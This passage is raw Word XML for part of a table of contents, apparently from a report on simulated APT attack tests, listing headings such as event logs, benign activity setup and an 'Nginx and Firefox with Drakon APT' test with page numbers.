                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="158616B6" w14:textId="6B5D3B71" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600088" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.6.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600088 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5421F365" w14:textId="5BE814FE" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600089" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.6.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log (Cont)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600089 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35835B22" w14:textId="65BE12C0" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600090" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.7</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15:39 -- TA1 ClearScope 2 -- Appstarter APK Micro APT Elevate</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600090 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B4C0158" w14:textId="16CCF93F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600091" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.7.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091 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DDC4636" w14:textId="45606C42" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600092" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.7.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092 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="067E7D22" w14:textId="72B68AAC" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600093" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.7.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600093 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D932A0A" w14:textId="1482371E" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600094" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.7.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600094 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51C08D4F" w14:textId="733E1A7A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600095" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.7.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log (Cont)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600095 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62F9FB12" w14:textId="7B866EA9" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600096" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.8</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Setup for Wednesday Night Test</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600096 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B21C68B" w14:textId="1EA03B53" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600097" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/16/2019 – Nginx and Firefox with Drakon APT and BITS</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600097 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49CA96A4" w14:textId="7B33C067" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600098" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600098 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C01EABD" w14:textId="41EE469F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600099" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600099 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
